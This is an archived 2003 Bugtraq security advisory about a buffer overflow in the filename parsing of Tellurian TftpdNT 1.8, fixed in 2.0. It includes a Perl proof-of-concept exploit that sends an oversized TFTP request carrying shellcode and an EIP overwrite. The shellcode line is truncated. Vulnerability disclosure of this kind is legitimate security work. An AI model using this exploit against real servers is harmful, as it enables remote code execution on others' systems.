Home page logo

bugtraq logo Bugtraq mailing list archives

Security Vulnerability in Tellurian TftpdNT (Long Filename)
From: Aviram Jenik <aviram () beyondsecurity com>
Date: Mon, 1 Sep 2003 14:32:36 +0300

Security Vulnerability in Tellurian TftpdNT (Long Filename)

Article reference: 

Tellurian TftpdNT (http://www.tellurian.com.au/) is a TFTP server for Windows 
NT and Windows 9x. 
A buffer overflow vulnerability in the product allows remote attackers to 
cause the product to overflow an internal buffer, while executing arbitrary 


Vulnerable systems: 
  * TftpdNT version 1.8 
 Immune systems: 
  * TftpdNT version 2.0 
 It is possible to cause a buffer overflow in the Tellurian TftpdNT product, 
while overwriting the EIP pointer - this allows remote command execution. 
 The overflow occurs in the product's parsing of the filename. 
 Vendor status: 
 The vendor has been informed, and has fixed the issue within 24 hours. A new 
version is available on the web site. 
 #!/usr/bin/perl -w 
 #Tellurian TFTP Server buffer overflow vulnerability 
 use IO::Socket; 
 $host = ""; 
 $port = "69"; 
 $shellcode = "\x90\xCC\x90\x90\x90\x90\x8B\xEC\x55\x8B\xEC\x33\ 
 $buf = "\x00\x02"; 
 $buf .= "\x41"x(508-length($shellcode)); 
 $buf .= $shellcode; 
 $buf .= "\x0F\x02\xC7"; # EIP 
 $buf .= "\x00\x6E\x65\x74\x61\x73\x63\x69\x69\x00"; 
 print "Length: ", length($buf), "\n"; 
 $socket = IO::Socket::INET->new(Proto => "udp") or die "Socket error: 
 $ () \n"; 
 $ipaddr = inet_aton($host) || $host; 
 $portaddr = sockaddr_in($port, $ipaddr); 
 send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send: $!\n"; 
 print "Done\n"; 

SecurITeam would like to thank STORM (storm () securiteam com) for finding this 

Aviram Jenik
Beyond Security Ltd.

Know that you're safe:

  By Date           By Thread  

Current thread:
  • Security Vulnerability in Tellurian TftpdNT (Long Filename) Aviram Jenik (Sep 02)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]